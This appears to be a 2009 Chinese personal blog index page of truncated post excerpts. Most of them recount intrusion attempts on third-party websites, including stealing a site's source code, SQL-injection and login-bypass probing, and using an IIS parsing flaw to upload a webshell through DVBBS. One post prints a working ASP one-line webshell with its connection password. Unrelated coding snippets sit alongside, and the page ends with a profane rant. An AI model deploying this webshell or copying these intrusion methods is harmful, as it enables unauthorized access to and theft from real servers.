2009年10月18日 星期日 下午 11:02
前沿:
因为看中了一份装饰网的源码,所以想要份源码,于是就有了下面的文章:
一:先简单分析下网站
asp的,网站做的很大方,简洁,这也是我喜欢的原因
手工加了个单引号'页面发生跳转,明显的做过过滤了,又翻了几个ID链接,仍旧如此。于是注入就放掉。
后台弱口令,admin/admin, 'or'='or'/'or'='or', admin/admin888,等测试了一般的都没用。呵呵,看来得详细搜集下网站信息了,那就先看下网 |
2009年10月09日 星期五 下午 11:05
<%
if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
%>
连接密码#
|
2009年10月06日 星期二 上午 01:23
由于今天用到了,所以贴下:
不过我本地测试,被畅游巡警拦截了。。。。
来源:杰少
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中。
所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm
一处是C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
我们简单写个代码试试,代码 |
2009年09月30日 星期三 上午 02:06
心情不怎么好!
一下班和姐谈了一下心情
然后开始看黑客X档案,我想这个时候除了做这个,也没什么心情做其他的事了。。。
看了一个小时后,还是烦躁。。。。于是就找了一个站,玩起来。手工看了又半个小时也没找到突破口,主页全是静态,后台PHP,GOOGLE了一下,找了几个PHP?id的页面,也没发现注入,后台测试了下,PHP万能密码,没希望,PHPADMIN也没有,看来手工只能到这,拿出扫描工具,对网站结构扫了一下,(自己模仿啊D写的一个扫描漏洞页面的小工具,自己又收集了一些漏洞页面信息),然后扫了一下,没想到很快 |
2009年09月29日 星期二 下午 11:49
前段时间,IIS解析漏洞爆出,很多站遭殃了,譬如,新云网站,科讯等站,在上传的时候我们我们上传a.asp;a.jpg小马文件后,它能够正常解析,
DVBBS8下:
首先找个DVBBS8.2的站,我们注册一用户,然后使用用户登录论坛,点击论坛
工具栏的“我的主页”,进入个人主页配置,然后点击“个人空间管理”给现有的空间标题起一个名字,然后点
“保存设置”按钮,接下来点击“自定义风格”,依旧在“样式风格CSS修改”里任意输入几个字符,然后点保存设置 |
2009年09月29日 星期二 下午 11:46
getenv
public static String getenv(String name)
- 获得指定的环境变量值。环境变量是一个取决于系统的外部命名的值。
如果安全管理器存在,则通过
|
2009年09月04日 星期五 下午 02:54
Unzip Vclskin.zip into any folder.
Compile Runtime package, the package filename will be VCLSkinRD#.dpk, where the # is the version of Delphi you are installing to. In the Delphi IDE choose menu "File. Open...", then find runtime package VCLSkinRD#.dpk, then click 'Compile' button.
Install Design package, the package file name is like VCLSkinDD#.dpk, where the # is the version of Delphi you are installing to. In the Delphi IDE choose menu "File. Open...", then fin |
2009年08月13日 星期四 下午 09:18
转自黑色幽默
放这,以后有用
Public Function URLEncode(ByRef strURL As String) As String
Dim I As Long
Dim tempStr As String
For I = 1 To Len(strURL)
If Asc(Mid(strURL, I, 1)) < 0 Then
tempStr = "%" & Right(CStr(Hex(Asc(Mid(strURL, I, 1)))), 2)
tempStr = "%" & Left(CStr(Hex(Asc(Mid(strURL, I, 1)))), Len(CStr(Hex(Asc(Mid(strURL, I, 1))))) - 2) & tempStr
URLEncode = URLEncode & tempStr
ElseIf (Asc |
2009年07月11日 星期六 下午 05:01
import java.awt.*;//引入包
import java.awt.event.*;
import javax.swing.*;
public class SB//定义类
{
public static void main(String[]args)//定义main()方法,是程序的入口点
{
Getsb frame=new Getsb();//创建窗口
frame.setTitle("Fuck you");
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
frame.setSize(250,150);//窗口大小
frame.show(); //窗口可见
}
}
class Getsb extends JFrame
|
2009年07月10日 星期五 下午 02:03
针对今天空间某人的留言:
妈的,你算个叼,你有什么资格来评价老子,老子学VC碍着你什么事了,老子就是小学毕业,老子就是没文化,老子照样学VC,你牛B吗?说别人的时候先看看自己什么熊样!
本人接触网络比较晚,08年正式接触网络,相继学习了网络基础知识,和最基本的JAVA知识,本人基本上都是自学,所以走了很多弯路,到现在也是菜鸟水平,不过本人有那份学习的心就够了,用不着你 |
|
|
|
